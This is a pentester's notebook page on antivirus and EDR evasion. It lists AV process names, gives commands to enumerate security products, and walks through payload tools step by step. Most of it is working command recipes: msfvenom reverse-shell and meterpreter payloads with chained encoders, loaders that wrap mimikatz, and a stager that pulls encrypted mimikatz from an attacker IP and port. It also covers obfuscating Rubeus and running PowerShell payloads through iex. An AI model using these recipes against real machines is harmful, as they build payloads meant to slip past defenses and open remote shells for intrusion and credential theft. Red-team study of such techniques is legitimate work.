Pentester's Promiscuous Notebook
TwitterGitHubBlogSponsor
Search
K
Links

AV / EDR Evasion

BypassAV Mindmap

Recon

Common AV process names:
Process Name
Vendor/Product
avp.exe
KIS / KES
cpda.exe
Check Point End Point Security
egui.exe
ESET GUI
ekrn.exe
ESET Kernel Service
MsMpEng.exe
Windows Defender
ntrtscan.exe
Trend Micro OfficeScan
tmlisten.exe
Trend Micro OfficeScan
Search for active AV processes on hosts (local admin priveleges required):
Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}
Identify Microsoft.NET version from inspecting assembly properties:
PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion
Identify Microsoft.NET version from querying the registry:
PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release
Windows build <-> default .NET Framework version associations:
Windows Build
Default .NET Framework Version
1511
4.6.1
1607
4.6.2
1703
4.7
1709
4.7.1
1803
4.7.2
1909+
4.8
.NET Framework version <-> CLR version associations:
.NET Framework Version
CLR Version
2.0, 3.0, 3.5
2
4, 4.5-4.8
4
Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i. e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.

Attacking EDRs

EDR Blindspots

BOFs with Python

Tools

msfvenom

$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe

Veil-Evasion

Hyperion + Pescramble
$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe

GreatSCT

Install and generate a payload:
$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}
$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
Exec with msbuild.exe and get a shell:
PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml

Ebowla

$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe

PEzor

Wrap executable into PEzor:
$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2

inceptor

ScareCrow

Huan

Cmd > .\Huan.exe mimikatz.exe mimiLoader.exe
Cmd > .\mimiLoader.exe

charlotte

$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>

MeterPwrShell

$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate

stager_libpeconv

$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe

PowerShell Tactics

PowerShell Obfuscation

Invoke-Obfuscation

Out-EncryptedScript.ps1

PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec

PowerShellArmoury

PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex

.NET Obfuscators

InvisibilityCloak

PS > wget https://github.com/h4wkst3r/InvisibilityCloak/raw/main/InvisibilityCloak.py -o InvisibilityCloak.py
PS > git clone https://github.com/GhostPack/Rubeus
PS > python .\InvisibilityCloak.py -d .\Rubeus\ -n (-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})) -m reverse
PS > cd Rubeus
PS > devenv /build Release .\ChOVuwPZcNQmXtKF.sln
InvisibilityCloak.ps1
$repo = "GhostPack/Rubeus"
$cloak = "C:\Users\snovvcrash.NIGHTCITY\Desktop\Tools\InvisibilityCloak.py"
$devenv = "C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.com"
$target = $repo.Split('/')[1]
$obf = -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
git clone "https://github.com/$repo" "C:\Windows\Temp\$target"
python $cloak -d "C:\Windows\Temp\$target" -n $obf -m reverse
& $devenv /build Release "C:\Windows\Temp\$target\$obf.sln"
mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Folders\share-host\$obf.exe"
#Remove-Item -Recurse -Force "C:\Windows\Temp\$target"

SharpSploit

SharpGen

Execution.ShellCode
$ ~/tools/PEzor/deps/donut/donut -i GruntHTTP.exe -o grunt.bin
$ echo -n 'var shellcode = Convert.FromBase64String("' > shellcode.txt
$ echo -n `base64 -w0 grunt.bin` >> shellcode.txt
$ echo '");' >> shellcode.txt
$ echo 'ShellCode.ShellCodeExecute(shellcode);' >> shellcode.txt
$ ~/.dotnet/dotnet bin/Debug/netcoreapp2.1/SharpGen.dll -f payload.exe -s shellcode.txt -c Shell -d net40
Last modified 17d ago